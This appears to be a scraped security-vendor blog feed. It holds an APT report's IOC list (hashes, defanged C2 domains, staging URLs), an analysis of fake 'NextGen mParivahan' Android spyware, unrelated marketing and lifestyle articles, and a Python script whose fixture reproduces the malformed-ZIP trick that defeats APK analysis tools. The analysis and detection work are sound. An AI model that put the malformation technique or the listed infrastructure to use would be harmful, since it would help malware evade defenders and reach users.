    Both C2 domains are associated with Cloudflare ASN 13335 and resolve to the 172.67.xx.xx IP range. Similar C2 domains on this ASN were previously leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection clusters, the observed TTPs, and the hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high confidence.

    Conclusion

    The Pakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to include critical sectors such as railways, oil & gas, and the Ministry of External Affairs. The group has shifted from HTA files to MSI packages as its primary staging mechanism and continues to employ techniques such as DLL side-loading, reflective loading, and AES decryption via PowerShell. Additionally, it is leveraging customized open-source tools such as Xeno RAT and Spark RAT, along with the newly identified CurlBack RAT. Compromised domains and fake sites are used for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance persistence and evade detection.

    SEQRITE Protection

    • LNK.SideCopy.49245.Gen
    • LNK.Trojan.49363.GC
    • SideCopy.Mal.49246.GC
    • HTA.SideCopy.49248.Gen
    • HTA.SideCopy.49247.Gen
    • HTA.Trojan.49362.GC
    • Trojan.Fmq

    IOCs

    Windows

    a5410b76d0cb36786e00d2968d3ab6e4 2024-National-Holidays-RH-PER_N-1.zip
    f404496abccfa93eed5dfda9d8a53dc6 2024-National-Holidays-RH-PER_N-1.pdf.lnk
    0e57890a3ba16b1ac0117a624f262e61 Security-Guidelines.zip
    57c2f8b4bbf4037439317a44c2263346 Security-Guidelines.pdf.lnk
    53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi
    97c3328427b72f05f120e9a98b6f9b09 installerr.msi
    0690116134586d41a23baed300fc6355 ConsoleApp1.exe
    ef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe
    9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll
    589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll
    0eb9e8bec7cc70d603d2d8b6efdd6bb5 update schedule for ndc 65 as discussed.txt
    8ceeeec0e33026114f028cbb006cb7fc policy update for this course.txt
    1d65fa0457a9917809660fff782689fe NDC65-Updated-Schedule.zip
    7637cbfa99110fe8e1074e7ead66710e NDC65-Updated-Schedule.pdf.lnk
    32a44a8f7b722b078b647e82cb9e85cf NDC65-Updated-Schedule.hta
    a2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll
    b45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf
    83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf
    cf6681cf1f765edb6cae81eeed389f78 suport.exe
    c952aca2036d6646c0cffde9e6f22775 DevApp.exe (Custom Xeno RAT)

    Linux

    b5e71ff3932c5ef6319b7ca70f7ba8da 2024-National-Holidays-RH-PER_N-1.zip
    0a67bfda993152c93a212087677f9b60 2024-National-Holidays-RH-PER_N-1.pdf
    e165114280204c39e99cf0c650477bf8 clinsixfer.elf (Custom Spark RAT)

    C2

    79.141.161[.]58:1256               Xeno RAT
    updates.widgetservicecenter[.]com  CurlBack RAT
    updates.biossysinternal[.]com      CurlBack RAT

    URLs

    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/
    hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf
    hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/
    hxxps://updates.widgetservicecenter.com/antivmcommand
    hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip
    hxxps://modspaceinterior.com/wp-content/upgrade/01/
    hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta
    hxxps://egovservice.in/vvcmcrts/
    hxxps://egovservice.in/vvcmc_safety_tank/
    hxxps://egovservice.in/testformonline/test_form
    hxxps://egovservice.in/payroll_vvcmc/
    hxxps://egovservice.in/pakora/egovservice.in/
    hxxps://egovservice.in/dssrts/
    hxxps://egovservice.in/cmc/
    hxxps://egovservice.in/vvcmcrtsballarpur72/
    hxxps://egovservice.in/dss/
    hxxps://egovservice.in/130521/set_authority/
    hxxps://egovservice.in/130521/13/

    Staging domains

    modspaceinterior[.]com
    drjagrutichavan[.]com
    nhp.mowr[.]gov[.]in
    pmshriggssssiwan[.]in
    educationportals[.]in
    egovservice[.]in
    gadchiroli.egovservice[.]in
    pen.egovservice[.]in
    cpcontacts.egovservice[.]in
    cpanel.egovservice[.]in
    webdisk.egovservice[.]in
    cpcalendars.egovservice[.]in
    webmail.egovservice[.]in
    www.dss.egovservice[.]in
    www.cmc.egovservice[.]in
    cmc.egovservice[.]in
    dss.egovservice[.]in
    mail.egovservice[.]in
    www.egovservice[.]in
    www.pakola.egovservice[.]in
    pakola.egovservice[.]in
    www.pakora.egovservice[.]in
    pakora.egovservice[.]in

    Host and PDB

    C:\ProgramData\LavaSoft\Sampeose.dll
    C:\ProgramData\LavaSoft\DUI70.dll
    C:\ProgramData\LavaSoft\girbesre.exe
    C:\ProgramData\LavaSoft\svnides.hta
    C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
    C:\Users\Public\Downloads\Document.pdf
    C:\Users\Public\Downloads\suport.exe
    E:\finalRnd\Myapp\obj\Debug\Myapp.pdb

    Decoys

    320bc4426f4f152d009b6379b5257c78 2024-National-Holidays-RH-PER_N-1.pdf
    9de50f9357187b623b06fc051e3cac4f Security-Guidelines.pdf
    c9c98cf1624ec4717916414922f196be NDC65-Updated-Schedule.pdf
    83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf

    MITRE ATT&CK

    TTP         Name
    Reconnaissance
    T1589.002   Gather Victim Identity Information: Email Addresses
    Resource Development
    T1583.001   Acquire Infrastructure: Domains
    T1584.001   Compromise Infrastructure: Domains
    T1587.001   Develop Capabilities: Malware
    T1588.001   Obtain Capabilities: Malware
    T1588.002   Obtain Capabilities: Tool
    T1608.001   Stage Capabilities: Upload Malware
    T1608.005   Stage Capabilities: Link Target
    T1585.002   Establish Accounts: Email Accounts
    T1586.002   Compromise Accounts: Email Accounts
    Initial Access
    T1566.002   Phishing: Spear phishing Link
    Execution
    T1106       Native API
    T1129       Shared Modules
    T1059       Command and Scripting Interpreter
    T1047       Windows Management Instrumentation
    T1204.001   User Execution: Malicious Link
    T1204.002   User Execution: Malicious File
    Persistence
    T1053.003   Scheduled Task/Job: Cron
    T1547.001   Registry Run Keys / Startup Folder
    Privilege Escalation
    T1548.002   Abuse Elevation Control Mechanism: Bypass User Account Control
    Defense Evasion
    T1036.005   Masquerading: Match Legitimate Name or Location
    T1036.007   Masquerading: Double File Extension
    T1140       Deobfuscate/Decode Files or Information
    T1218.005   System Binary Proxy Execution: Mshta
    T1574.002   Hijack Execution Flow: DLL Side-Loading
    T1027       Obfuscated Files or Information
    T1620       Reflective Code Loading
    Discovery
    T1012       Query Registry
    T1016       System Network Configuration Discovery
    T1033       System Owner/User Discovery
    T1057       Process Discovery
    T1082       System Information Discovery
    T1083       File and Directory Discovery
    T1518.001   Software Discovery: Security Software Discovery
    Collection
    T1005       Data from Local System
    T1056.001   Input Capture: Keylogging
    T1123       Audio Capture
    T1113       Screen Capture
    T1560.001   Archive Collected Data: Archive via Utility
    Command and Control
    T1105       Ingress Tool Transfer
    T1571       Non-Standard Port
    Exfiltration
    T1041       Exfiltration Over C2 Channel

    Authors:

    Sathwik Ram Prakki

    Kartikkumar Jivani




  • How Can Advanced Gadgets Help Your Business Succeed?


    In today’s competitive business environment, leveraging advanced technology is not just advantageous but often essential for staying ahead. From improving operational efficiency to enhancing customer experiences, advanced gadgets play a crucial role in driving business success. Despite the challenges businesses face, such as the statistic that up to 70% of all business partnerships fail, integrating advanced gadgets can mitigate risks and propel growth.

    Enhancing Operational Efficiency

    One of the primary benefits of advanced gadgets in business is their ability to streamline operations and boost productivity. Whether it’s through automation tools, smart devices, or advanced software solutions, technology empowers businesses to automate repetitive tasks, optimize workflows, and allocate resources more effectively. By reducing manual errors and accelerating processes, businesses can achieve greater efficiency and operational excellence.

    Ensuring Workplace Safety

    The safety and security of employees and assets are paramount concerns for any business. According to the National Fire Protection Association, an average of 3,340 fires occur in offices every year, highlighting the importance of robust safety measures. Advanced gadgets such as smart fire detection systems, CCTV cameras with AI-powered analytics, and automated emergency response systems can significantly enhance workplace safety. These technologies not only detect potential hazards early but also enable swift responses, mitigating risks and minimizing damage.

    Navigating Regulatory Compliance

    Navigating regulatory requirements and tax obligations is another critical aspect of business operations. For example, in New Jersey, the State Treasury imposes a 6.625% Sales Tax on sales of most tangible personal property, specified digital products, and certain services unless exempt under state law. Advanced gadgets equipped with financial management software can automate tax calculations, ensure compliance with regulatory standards, and facilitate accurate reporting. By reducing the burden of manual compliance tasks, businesses can avoid penalties and optimize financial processes.

    Empowering Customer Engagement

    Customer engagement and satisfaction are fundamental drivers of business growth. Advanced gadgets such as customer relationship management (CRM) systems, personalized marketing automation tools, and AI-powered chatbots enable businesses to deliver tailored experiences and responsive customer service. These technologies analyze customer data in real-time, anticipate needs, and personalize interactions, fostering long-term customer loyalty and driving revenue growth.

    Harnessing Data for Strategic Insights

    In today’s data-driven economy, insights derived from data analytics can provide businesses with a competitive edge. Advanced gadgets equipped with analytics tools collect, analyze, and visualize data from various sources, offering valuable insights into market trends, customer behavior, and operational performance. By making informed decisions based on data-driven insights, businesses can identify opportunities, mitigate risks, and optimize strategies for sustainable growth.

    Improving Decision-Making with Real-Time Analytics

    Advanced gadgets are invaluable in empowering businesses with real-time data analytics capabilities. These tools enable organizations to gather and analyze data swiftly, providing deep insights into market dynamics, consumer preferences, and operational efficiencies. By harnessing these insights, businesses can make informed decisions promptly, adapt strategies proactively, and capitalize on emerging opportunities. Real-time analytics not only enhances strategic planning but also optimizes resource allocation, driving sustained growth and competitiveness in today’s fast-paced business landscape.

    Conclusion

    In conclusion, integrating advanced gadgets into business operations can significantly enhance efficiency, safety, compliance, customer engagement, and strategic decision-making. Despite the challenges highlighted by statistics showing high business partnership failure rates and the prevalence of office fires, advanced technology offers solutions to mitigate risks and drive success. By leveraging automation, enhancing safety measures, ensuring regulatory compliance, empowering customer engagement, and harnessing data-driven insights, businesses can navigate challenges more effectively and capitalize on opportunities in a rapidly evolving marketplace.

    As technology continues to evolve, businesses that embrace advanced gadgets not only position themselves for current success but also future-proof their operations against emerging challenges. By investing in the right technology solutions and adapting them to meet specific business needs, organizations can innovate, grow, and thrive in an increasingly competitive landscape. Embracing the transformative potential of advanced gadgets is not merely advantageous but imperative for businesses striving to achieve sustainable success and leadership in their respective industries.




  • Understand the Key Differences & Choose the Right Solution


    In today’s rapidly evolving cyber landscape, organizations face an increasing number of sophisticated threats. Consequently, the need for robust cybersecurity measures has never been more critical. Two prominent solutions in this domain are Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR). While both serve essential roles in safeguarding an organization’s digital assets, they cater to different needs and offer distinct functionalities. This article delves deep into the nuances of EDR vs XDR, providing insights into their features, differences, and when to deploy each solution.

    What is EDR?

    Endpoint Detection and Response (EDR) is a cybersecurity approach that focuses primarily on monitoring and securing endpoint devices such as laptops, desktops, and servers. EDR solutions are designed to detect, investigate, and respond to potential threats at the endpoint level. By employing advanced analytics and automated responses, EDR tools operate under the premise of an “assume breach” mentality. This means they are always on the lookout for suspicious activities, even if the organization believes its systems are secure.

    Key Features of EDR

    • Real-time Monitoring: EDR solutions provide continuous surveillance of endpoint activities, enabling organizations to detect anomalies swiftly.
    • Automated Response: EDR tools can automatically contain threats, limiting their potential impact before human intervention is required.
    • Data Collection: These solutions gather extensive data from endpoints, including system logs, file access, and user activities, allowing for thorough investigations.
    • Threat Intelligence: EDR platforms leverage threat intelligence to enhance their detection capabilities, identifying known threats and emerging vulnerabilities.

    Benefits of EDR

    • Focused Security: EDR is primarily designed to protect endpoints, making it an excellent choice for organizations with significant endpoint exposure.
    • Cost-effective: For businesses with limited budgets, EDR solutions can provide robust endpoint protection without the higher costs associated with more comprehensive solutions.
    • Scalability: As organizations grow, EDR solutions can easily adapt to increasing numbers of endpoints and evolving threats.

    What is XDR?

    Extended Detection and Response (XDR) is a holistic cybersecurity solution that integrates data from multiple security layers, including endpoints, networks, servers, and cloud environments. Unlike EDR, which focuses solely on endpoint devices, XDR aims to provide a comprehensive view of an organization’s security posture by correlating data across various sources. This enables security teams to detect and respond to threats more effectively.

    Key Features of XDR

    • Unified Security Approach: XDR consolidates data from various security tools and platforms, offering a centralized view of threats across the entire infrastructure.
    • Enhanced Visibility: By analyzing data from multiple sources, XDR provides deeper insights into potential threats, making it easier to identify complex attack patterns.
    • Automated Threat Response: Like EDR, XDR also employs automation to respond to threats, but it does so across a broader range of data sources.
    • Cross-domain Detection: XDR is capable of detecting threats that may originate from different areas, such as network traffic, cloud applications, and email systems.

    Benefits of XDR

    • Comprehensive Coverage: XDR’s ability to integrate data from various sources ensures that organizations have a complete view of their security landscape.
    • Improved Incident Response: By providing a unified view of threats, XDR allows security teams to respond more quickly and effectively to incidents.
    • Reduced Complexity: XDR simplifies security operations by reducing the number of tools and interfaces security teams must manage.

    EDR vs XDR: Key Differences

    While both EDR and XDR are essential components of a modern cybersecurity strategy, they serve different purposes and have distinct features. Below is a comparison highlighting the critical differences between EDR and XDR:

    Feature            | EDR (Endpoint Detection and Response)    | XDR (Extended Detection and Response)
    -------------------|------------------------------------------|----------------------------------------------
    Scope              | Focuses on endpoint devices              | Covers multiple security layers
    Data Sources       | Endpoint-specific data                   | Integrates data from various sources
    Detection Methods  | Signature-based and behavioral analysis  | Advanced analytics, AI, and data correlation
    Threat Detection   | Primarily endpoint threats               | Advanced threats across all domains
    Incident Response  | Endpoint-focused                         | Cross-domain response
    Integration        | Typically integrated with endpoint tools | Integrates with multiple security solutions

    When to Choose EDR

    Organizations may opt for EDR solutions under specific circumstances:

    • Small to Medium-Sized Infrastructure: Businesses with fewer endpoints and primarily endpoint-based threats may find EDR sufficient for their needs.
    • Budget Constraints: EDR solutions tend to be more cost-effective than XDR, making them ideal for organizations with limited financial resources.
    • Strong Endpoint Security Posture: If an organization already has robust endpoint security measures in place, EDR can enhance those efforts without overwhelming complexity.

    When to Choose XDR

    On the other hand, XDR is more suitable for organizations facing different challenges:

    • Complex IT Environments: Organizations with extensive IT infrastructures that require visibility across endpoints, networks, and cloud applications should consider XDR.
    • High-Risk Industries: Sectors such as finance, healthcare, and government, which are often targeted by sophisticated threats, can benefit from XDR’s comprehensive approach.
    • Need for Advanced Analytics: Organizations looking to leverage machine learning and AI to identify patterns across multiple data sources will find XDR more advantageous.

    The Role of Seqrite EDR and XDR

    Seqrite offers advanced EDR and XDR solutions tailored to meet the diverse needs of organizations. With a focus on comprehensive endpoint protection and extended visibility, Seqrite’s offerings empower businesses to strengthen their security posture effectively.

    Seqrite EDR

    Seqrite EDR provides real-time monitoring and automated response capabilities, ensuring that organizations can detect and mitigate threats swiftly. Its user-friendly interface and robust analytics make it a valuable addition to any cybersecurity strategy.

    Seqrite XDR

    Seqrite XDR enhances threat detection and response capabilities by integrating data from various security layers. This solution empowers organizations to gain deeper insights into their security landscape, facilitating quicker and more effective incident response.

    Conclusion

    In the ongoing battle against cyber threats, understanding the distinctions between EDR and XDR is vital for organizations looking to enhance their security measures. While EDR excels in endpoint protection, XDR provides a more comprehensive view of an organization’s security posture by integrating data across multiple sources. Depending on the specific needs and challenges faced by an organization, either solution—or a combination of both—can significantly bolster cybersecurity efforts.

    By investing in advanced solutions like Seqrite EDR and XDR, organizations can ensure they are well-equipped to navigate the complexities of the modern threat landscape and safeguard their digital assets effectively.



    Source link

  • Beware! Fake ‘NextGen mParivahan’ Malware Returns



    Cybercriminals continually refine their tactics, making Android malware more insidious and challenging to detect. A new variant of the fake NextGen mParivahan malware has emerged, following its predecessor’s deceptive strategies but introducing significant enhancements.

    Previously, attackers exploited the government’s traffic notification system to distribute malware, sending fake messages that appeared to be official traffic violation alerts. These messages contained details like ticket numbers and vehicle registration information to appear legitimate, tricking users into downloading a malicious app. Once installed, the app requested extensive permissions, hid its icon, and silently exfiltrated sensitive data, including SMS messages—while communicating with attackers via a Telegram bot.

    Figure 1. WhatsApp message received by Victim

    In this latest variant, the malware is distributed under the guise of “NextGen mParivahan,” mimicking the official government application. It uses the same distribution method as before—leveraging fake traffic violation messages to lure users into installing the malicious app.

    The official NextGen mParivahan app, developed by the Ministry of Road Transport & Highways, provides digital access to driving licenses, vehicle registration certificates, and other transport services. Available on the Google Play Store, it replaces the earlier mParivahan app with improved features and user experience.

    However, cybercriminals have seized the opportunity presented by the app’s rebranding, distributing malware under the “NextGen mParivahan” name to deceive users. In this latest variant, the malware retains its SMS-stealing capabilities. It has significantly expanded its reach—now targeting messages from social media, communication, and e-commerce apps, posing an even more significant threat to user privacy.

    Moreover, some samples employ a stealthier command-and-control (C2) mechanism, concealing the C2 details within a compiled .so file and generating them dynamically at runtime. This approach greatly complicates detection and analysis. Some samples are also intentionally malformed to hinder security tooling, and use a multi-stage dropper-payload architecture to bypass signature-based and heuristic detection systems.

    Our previous blog analyzed the earlier version’s infection chain and communication tactics (Beware! Malicious Android Malware Disguised as Government Alerts). These latest variants not only retain those functionalities but expand on them, increasing both their stealth and data theft capabilities.

    In this blog, we’ll explain how this new variant operates and why its new enhancements make it an even greater threat to Android users.

    Technical analysis:

    We came across two variants of the new version: one utilizing a malformed multi-stage dropper-payload architecture and another employing a stealthier C2 extraction method while stealing notification data from other apps.

    1. Malformed multi-stage dropper-payload

                  | First Stage – Dropper             | Second Stage – Payload
    File name     | e_challan_report                  | parivahan
    MD5           | ad4626eff5238ce7c996852659c527bc  | ae1f49bd14027c7adea18147cb02f72a
    App name      | NextGen mParivahan                | NextGen mParivahan
    Package name  | com.xyz.dropper                   | com.example.icici

    Anti-analysis technique

    The malware author intentionally crafted these dropper and payload APKs to hinder static analysis. Many open-source Android APK analysis tools failed to process this APK, making analysis more challenging. See below:

    Apktool failed to decompile the APK:

    Figure 2. Apktool Error

    Jadx failed to decompile:

    Figure 3. Jadx Error

    Androguard failed to decompile:

    Figure 4. Androguard Error

    Bytecode Viewer failed to decompile:

    Figure 5. Bytecode viewer Error

    7zip also failed to extract the APK file:

    Figure 6. 7zip Error

    The Android build tools AAPT and AAPT2 (Android Asset Packaging Tool) are also unable to dump the AndroidManifest.xml file:

    Figure 7. AAPT Error

    Additionally, this malformed APK fails to install on Android 8.1 and earlier with a corrupt XML error, because those OS versions cannot extract the manifest the way later Android versions do.

    Figure 8. Android 8.1 APK installation Error

    The error displayed by all these tools indicates an unsupported compression method, meaning the APK uses a compression method value that the ZIP format does not define. However, AAPT and Android 8.1 (API level 27) report a corrupt AndroidManifest.xml error that is unrelated to the unsupported compression method. Despite this, the malformed APK installs and runs without any issues on Android devices and emulators running Android 9 (API level 28) and above.

    Why Do Analysis Tools Fail While Android OS (9+) Runs This APK?

    An APK file is essentially a ZIP archive. Below is its header format, where the values at offsets 08 and 09 indicate the compression method used in the ZIP file.

    Figure 9. Structure of APK ZIP file (Reference: The structure of a PKZip file)

    Android APK files follow the ZIP format and typically use two compression methods:

    1. Store (No Compression) – Used for files that don’t need compression, such as pre-optimized binaries and some assets.
    2. Deflate (Standard Compression) – The most commonly used method for compressing resources, XML files, and other non-executable content.

    The compression method used by most APK files:

    Figure 10. Normal file Hex

    The compression method used by this malformed dropper APK file is neither Deflate nor Store. Its value is 0x1998 (decimal 6552), which is not a compression method defined by the ZIP format.

    Figure 11. Malformed APK Hex

    • All analysis tools strictly follow the ZIP format and expect the compression method to be either Deflate or Store only. However, Android OS only checks whether the compression method is Deflate or not. If it is not Deflate, the OS assumes it to be Store (i.e., uncompressed).
    • Android 9 introduced a different method for parsing monolithic apps compared to Android 8. This new implementation handles asset access differently. As a result, certain APKs that caused manifest corruption errors in Android 8 and earlier versions no longer encounter this issue on Android 9.

    Extracting and decoding AndroidManifest file

    I wrote a script to extract the raw AndroidManifest.xml from an APK by parsing its ZIP structure. It locates the Central Directory, finds AndroidManifest.xml, extracts its compression details and raw data, and then, by using Androguard, decodes the extracted raw AndroidManifest.xml into a readable XML format.

    Figure 12. Extraction and decoding AndroidManifest.xml
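As an added example (not the script from this post), the following Python reproduces that workflow on a constructed in-memory APK: it parses the End of Central Directory record and the central directory by hand, flags any entry whose method is neither Store nor Deflate, and extracts AndroidManifest.xml the lenient way this post attributes to Android 9+ (anything that is not Deflate is read as stored), verifying the CRC-32 afterwards. Python's strict zipfile module stands in for the analysis tools that reject the file; the 0x1998 fixture, the dummy manifest bytes and the package name are constructed, and the Androguard decoding step is left out.

```python
"""Audit an APK (a ZIP archive) for non-standard compression methods and
recover AndroidManifest.xml the lenient way described above.
Added example on a constructed in-memory fixture, not the post's script."""
import io
import struct
import zipfile
import zlib
from typing import Dict, NamedTuple

ZIP_STORED, ZIP_DEFLATED = 0, 8
EOCD_SIG, CD_SIG, LFH_SIG = b"PK\x05\x06", b"PK\x01\x02", b"PK\x03\x04"
MANIFEST = b'<manifest package="com.example.constructed"/>'  # constructed dummy


class Entry(NamedTuple):
    name: str
    method: int
    crc: int
    csize: int
    usize: int
    cd_offset: int     # position of this central directory header
    local_offset: int  # position of the matching local file header


def parse_central_directory(data: bytes) -> Dict[str, Entry]:
    """Find the End of Central Directory record, then walk the 46-byte central
    directory headers; the compression method is the 16-bit field at offset 10."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("not a ZIP archive: EOCD record missing")
    _, _, _, _, n_total, _, cd_off, _ = struct.unpack_from("<4s4H2LH", data, eocd)
    entries: Dict[str, Entry] = {}
    pos = cd_off
    for _ in range(n_total):
        fields = struct.unpack_from("<4s6H3L5H2L", data, pos)
        if fields[0] != CD_SIG:
            raise ValueError(f"bad central directory signature at {pos:#x}")
        method, crc, csize, usize = fields[4], fields[7], fields[8], fields[9]
        name_len, extra_len, comment_len, lfh_off = fields[10], fields[11], fields[12], fields[16]
        name = data[pos + 46:pos + 46 + name_len].decode("utf-8")
        entries[name] = Entry(name, method, crc, csize, usize, pos, lfh_off)
        pos += 46 + name_len + extra_len + comment_len
    return entries


def find_nonstandard_methods(data: bytes) -> Dict[str, int]:
    """{entry name: method} for entries that are neither Store (0) nor
    Deflate (8); strict parsers refuse to process such archives."""
    return {e.name: e.method for e in parse_central_directory(data).values()
            if e.method not in (ZIP_STORED, ZIP_DEFLATED)}


def extract_lenient(data: bytes, name: str) -> bytes:
    """Extract one entry as the post says Android 9+ does: inflate when the
    method is Deflate, otherwise treat the bytes as stored. CRC-32 and size
    from the central directory are verified so a wrong guess raises."""
    entry = parse_central_directory(data)[name]
    lfh = struct.unpack_from("<4s5H3L2H", data, entry.local_offset)
    if lfh[0] != LFH_SIG:
        raise ValueError(f"{name}: local file header signature mismatch")
    start = entry.local_offset + 30 + lfh[9] + lfh[10]  # skip name and extra field
    raw = data[start:start + entry.csize]
    out = zlib.decompress(raw, -zlib.MAX_WBITS) if entry.method == ZIP_DEFLATED else raw
    if len(out) != entry.usize or (zlib.crc32(out) & 0xFFFFFFFF) != entry.crc:
        raise ValueError(f"{name}: CRC/size mismatch after lenient extraction")
    return out


def strict_read_fails(data: bytes, name: str) -> bool:
    """True when Python's zipfile (strict, like the tools above) refuses the entry."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            zf.read(name)
        return False
    except (NotImplementedError, zipfile.BadZipFile):
        return True


def build_sample_apk(manifest_method: int = ZIP_STORED) -> bytes:
    """Constructed fixture: a tiny APK-like archive. With manifest_method set
    to 0x1998 it mimics the malformed dropper by rewriting the method field of
    AndroidManifest.xml in both the local header (offset 8) and the central
    directory header (offset 10); sizes and CRC stay valid."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", MANIFEST, compress_type=zipfile.ZIP_STORED)
        zf.writestr("classes.dex", b"dex\n035\x00" + bytes(64), compress_type=zipfile.ZIP_DEFLATED)
    data = bytearray(buf.getvalue())
    if manifest_method != ZIP_STORED:
        entry = parse_central_directory(bytes(data))["AndroidManifest.xml"]
        struct.pack_into("<H", data, entry.local_offset + 8, manifest_method)
        struct.pack_into("<H", data, entry.cd_offset + 10, manifest_method)
    return bytes(data)


if __name__ == "__main__":
    for label, apk in (("normal", build_sample_apk()), ("malformed", build_sample_apk(0x1998))):
        print(label, find_nonstandard_methods(apk), strict_read_fails(apk, "AndroidManifest.xml"))
        print("  manifest via lenient parse:", extract_lenient(apk, "AndroidManifest.xml"))
```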

    Below is the decoded AndroidManifest.xml of the Dropper APK. It requests permissions for QUERY_ALL_PACKAGES to list installed apps and REQUEST_INSTALL_PACKAGES to install the payload application.

    Figure 13. Decoded AndroidManifest xml file of Dropper application.

    Below is the decoded AndroidManifest.xml of the Payload APK. It requests sensitive permissions such as RECEIVE_SMS, READ_SMS, and SEND_SMS to access and send SMS messages.

    Figure 14. Decoded AndroidManifest xml from payload application

    Malware execution

    After launch, the Dropper application prompts the user to update the app. Upon clicking “Update,” it requests permission to allow installations from unknown sources. Once granted, it installs the Payload APK, which uses the same icon as the Dropper but hides its icon from the app drawer.

    Figure 15. Dropper application execution

    Now, if the user clicks on the mParivahan app icon, it launches the Payload application. First, it requests SMS and Call permissions. Then, it displays a page asking the user to enter their vehicle and phone numbers to track challan status. Next, it prompts the user to pay ₹1 via PhonePe, Google Pay, or Paytm, requiring them to enter their payment PIN. After the transaction, it shows a confirmation page stating, “Payment completed, wait for 30 minutes, and do not delete the app from the device.”

    Figure 16. Payload application execution

    However, the application steals the entered information in the background and saves it to a Firebase database. Since the app has SMS access permissions, it also captures incoming SMS data and uploads it to Firebase.

    Figure 17. Pin and device info stealing code

    2. Stealthier native C2 extraction and notification stealer

    File name     | NextGen mParivahan.apk
    MD5           | 8bf7ea1c35697967a33c0876df5f30b9
    App name      | NextGen mParivahan
    Package name  | com.sakurai.endo3798132


    Upon launch, the second variant requests SMS and call management permissions. It then prompts the user to grant notification access to the malware. After obtaining all necessary permissions, the user is asked to enter a phone number. Once the user clicks “Continue,” it opens the Google homepage and hides its icon.

    Figure 18. App execution

    The malware, having been granted notification access, continuously monitors notifications. Whenever a new notification is posted, it captures the data and sends it to the C2 server.

    Figure 19. Notification stealer code

    The malware maintains a list of applications targeted for notification theft, including WhatsApp, Facebook, Amazon, Zomato, Telegram, Google Messages, and Gmail.

    Figure 20. Targeted application list

    C2 extraction from native code

    The malware dynamically generates the C2 server URL at runtime, avoiding plain-text storage to evade detection. The figure below shows code from the Java section, where the SecreatHeven class is responsible for loading the native library “libbunnycoban.so” and defining native functions. Here, the bunnylovesCarrot() function returns the C2 server URL. There are two additional functions, hiddendandelion() and SecreatAcron(), that return the IP info service URL and IP info token. The malware might use these functions during C2 server generation, as they are not referenced elsewhere in the code.

    Figure 21. Java code loading so file

    The snippet below shows the code that constructs the C2 server URL from the .so file.

    Figure 22. Code used to construct c2 server from so file

    The logs clearly reveal the C2 server used by this malware:

    Figure 23. c2 mention in logcat

    Both variants also have SMS-stealing capabilities similar to the previous version. They access SMS data and send it to the extracted C2 server or Firebase. Additionally, they register a boot-completed broadcast receiver for persistence, which allows the application to start in the background after the device boots.


    MITRE ATT&CK Tactics and Techniques:

    Quick Heal Detection of Android Malware

    Quick Heal detects such malicious applications as variants of Android.Spyagent.A.

    It is recommended that all mobile users install a trusted Anti-Virus like “Quick Heal Mobile Security for Android” to mitigate such threats and stay protected. Our antivirus software restricts users from downloading malicious applications on their mobile devices. Download your Android protection here

    Conclusion:

    This malware variant demonstrates how cybercriminals continuously advance their techniques to evade detection and steal more user data. Leveraging malformed APKs, dynamic C2 generation, and anti-analysis methods makes it increasingly difficult for traditional security tools to identify their malicious activities. Additionally, their ability to access notifications, SMS, and sensitive app data poses a significant risk to user privacy.

    However, as threats evolve, so do analysis methodologies. Security solutions and threat intelligence efforts are improving detection techniques by deep-diving into obfuscation strategies, dynamic analysis, and advanced threat-hunting approaches. Strengthening security awareness, using trusted sources for app installations, and employing modern analysis tools are essential in combating these emerging threats.

    IOCs

    URLs:

    Https[:]//cyberdefensetech[.]cc/


    TIPS TO STAY DIGITALLY SAFE:

    • Download applications only from trusted sources like Google Play Store.
    • Do not click on any links received through messages or any other social media platforms as they may be intentionally or inadvertently pointing to malicious sites.
    • Read the pop-up messages from the Android system before accepting or allowing any new permissions.
    • Be extremely cautious about what applications you download on your phone, as malware authors can easily spoof the original applications’ names, icons, and developer details.
    • For enhanced phone protection, always use a good antivirus like Quick Heal Mobile Security for Android.

    Don’t wait! Secure your smartphones today with Quick Heal Total Security for Mobiles & Smartphones – Buy or Renew Today!




    Source link

  • How Has Medical Technology Impacted the Surrogacy Process?


    Advancements in medical technology have significantly transformed the surrogacy process, offering new opportunities and improving outcomes for all parties involved. From the initial application to post-birth care, technology plays a crucial role in making surrogacy a viable and successful option for many families. Let’s explore how these advancements have impacted the various stages of the surrogacy journey.

    Streamlining the Application Process

    Every year, thousands of women express their interest in becoming surrogate mothers. The process begins with a thorough application and screening to ensure candidates are suitable for the role. Medical technology has streamlined this initial stage, enabling agencies to efficiently process and review applications. Online platforms and databases allow for quick and secure submission of documents, while advanced screening tools help identify potential surrogates who meet the necessary health and psychological criteria.

    Ensuring Health and Compatibility

